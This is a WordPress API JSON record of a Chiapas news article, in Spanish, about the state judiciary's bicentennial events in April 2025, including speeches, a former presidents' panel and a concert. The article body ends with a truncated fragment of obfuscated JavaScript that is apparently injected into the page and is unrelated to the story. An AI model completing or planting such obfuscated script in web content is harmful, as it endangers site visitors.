{"id":21638,"date":"2025-04-29T02:35:36","date_gmt":"2025-04-29T02:35:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21638"},"modified":"2025-04-29T02:35:37","modified_gmt":"2025-04-29T02:35:37","slug":"inicia-poder-judicial-conmemoracion-de-los-200-anos-de-justicia-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21638","title":{"rendered":"Inicia Poder Judicial conmemoraci\u00f3n de los 200 a\u00f1os de justicia en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" data-id=\"21639\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-1024x725.jpg\" alt=\"\" class=\"wp-image-21639\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-1024x725.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-300x212.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-768x544.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-1536x1087.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0033-2048x1450.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"21641\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-1024x681.jpg\" alt=\"\" class=\"wp-image-21641\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0034-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"21643\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-1024x681.jpg\" alt=\"\" class=\"wp-image-21643\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0031-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"21642\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-1024x681.jpg\" alt=\"\" class=\"wp-image-21642\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0032-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"683\" height=\"1024\" data-id=\"21640\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030-683x1024.jpg\" alt=\"\" class=\"wp-image-21640\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030-683x1024.jpg 683w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030-200x300.jpg 200w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030-768x1152.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030-1024x1536.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250428-WA0030.jpg 1066w\" sizes=\"auto, (max-width: 683px) 100vw, 683px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u201cConmemoramos estos dos siglos de impartir justicia en Chiapas, con eventos significativos y con espacios dignos para las y los trabajadores y para la atenci\u00f3n de las personas usuarias\u201d; Juan Carlos Moreno Guill\u00e9n.<\/li>\n<\/ul>\n\n\n\n<p>28 de abril del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial inici\u00f3 el Ciclo Jur\u00eddico y Cultural, con el que se conmemora el Bicentenario de esta casa de la justicia, que, desde su establecimiento en 1825, ha sido pilar fundamental en la consolidaci\u00f3n del Estado de Derecho, garantizando el acceso a la justicia, la protecci\u00f3n de los derechos humanos y la preservaci\u00f3n del orden constitucional en nuestra entidad.<\/p>\n\n\n\n<p>Durante el inicio de esta conmemoraci\u00f3n, el magistrado presidente Juan Carlos Moreno Guill\u00e9n, acompa\u00f1ado de la presidenta del Voluntariado Dalal Jehan Rabann Castell, anunci\u00f3 que en las actividades programadas en este Ciclo se contar\u00e1 con chiapanecas y chiapanecos que se han destacado en el \u00e1mbito jur\u00eddico a nivel nacional e internacional, como con la conferencia magistral disertada por el presidente del Tribunal Federal de Justicia Administrativa, magistrado Guillermo Valls Esponda.<\/p>\n\n\n\n<p>En esta conferencia, el magistrado Moreno Guill\u00e9n reconoci\u00f3 la participaci\u00f3n y disposici\u00f3n del magistrado Valls Esponda para compartir su conocimiento y experiencia al realizar un recorrido de los acontecimientos que marcaron la historia y el destino del Poder Judicial de Chiapas, lo que enriqueci\u00f3 este espacio de reflexi\u00f3n y an\u00e1lisis.<\/p>\n\n\n\n<p>\u201cConmemoramos estos dos siglos de impartir justicia en Chiapas, no s\u00f3lo con los tres d\u00edas de actividades, sino con eventos significativos todo el a\u00f1o; adem\u00e1s, qu\u00e9 mejor manera de honrar el quehacer judicial que con el mejoramiento de la infraestructura para contar con espacios dignos para las y los trabajadores y las personas usuarias\u201d, resalt\u00f3 Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Por su parte, el conferencista Guillermo Valls Esponda agradeci\u00f3 la invitaci\u00f3n para ser part\u00edcipe de este evento que conmemora el Bicentenario de esta instituci\u00f3n, y felicit\u00f3 a quienes integran la casa de la justicia chiapaneca por su compromiso con la capacitaci\u00f3n constante.<\/p>\n\n\n\n<p>\u201cQuiero felicitar al magistrado presidente Juan Carlos Moreno por esta iniciativa de combinar el \u00e1mbito jur\u00eddico con lo cultural, porque una sociedad sin cultura es una sociedad que no encuentra la debida convivencia y, por lo tanto, no encuentra la paz, y como bien dicen en el Poder Judicial de Chiapas, la justicia es la paz\u201d, apunt\u00f3 Valls Esponda.<\/p>\n\n\n\n<p>Asimismo, en este primer d\u00eda se realiz\u00f3 el conversatorio \u201cHaciendo Memoria por una Justicia Humanista\u201d, que reuni\u00f3 a la expresidenta y expresidentes del Poder Judicial del Estado de Chiapas, moderado por el magistrado presidente Juan Carlos Moreno Guill\u00e9n, representando un espacio respetuoso, donde la y los extitulares del Poder Judicial compartieron sus reflexiones, experiencias, logros y desaf\u00edos al frente de esta instituci\u00f3n.<\/p>\n\n\n\n<p>La y los expresidentes que conformaron este conversatorio fueron: Sonia Sim\u00e1n Morales, Juan Gabriel Couti\u00f1o G\u00f3mez, Jos\u00e9 Francisco Trujillo Ochoa, Milton Escobar Castillejos, Juan Roque Flores y Jorge Luis Arias Zebad\u00faa.<\/p>\n\n\n\n<p>Adem\u00e1s, en estas primeras actividades de este Ciclo Jur\u00eddico y Cultural se llev\u00f3 a cabo un emotivo concierto denominado \u201cLa justicia es la paz\u201d, interpretado por la Orquesta de M\u00fasica Popular de la Universidad de Ciencias y Artes de Chiapas (Unicach), y la presentaci\u00f3n de la exposici\u00f3n fotogr\u00e1fica \u201cA trav\u00e9s del tiempo\u201d, descrita por el cronista de la ciudad, Jorge Alejandro S\u00e1nchez Flores; as\u00ed como la expo-venta de libros especializados en el \u00e1mbito jur\u00eddico, que enmarcan la nueva imagen del emblem\u00e1tico Vest\u00edbulo de la Jurisprudencia, del palacio de justicia de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Participaron en estos eventos el presidente de la Mesa Directiva del Congreso, Luis Ignacio Avenda\u00f1o Berm\u00fadez; la presidenta del Tribunal Administrativo, Edna Maritza Morales Bautista; y del Tribunal Federal de Justicia Administrativa: el presidente de la Sala Regional Chiapas, Alberto Rodr\u00edguez Garc\u00eda; la magistrada de la Segunda Ponencia de Sala Regional de Chiapas, Lidia Margarita Roblero Hern\u00e1ndez, y la magistrada de la Tercera Ponencia de la Sala Regional de Chiapas, Alejandra Mart\u00ednez Mart\u00ednez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u201cConmemoramos estos dos siglos de impartir justicia en Chiapas, con eventos significativos y con espacios dignos para las y los trabajadores y para la atenci\u00f3n de las personas usuarias\u201d; Juan Carlos Moreno Guill\u00e9n. 28 de abril del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial inici\u00f3 el Ciclo Jur\u00eddico y Cultural, con el que se conmemora el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21642,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21638","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21638","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21638"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21638\/revisions"}],"predecessor-version":[{"id":21644,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21638\/revisions\/21644"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21642"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}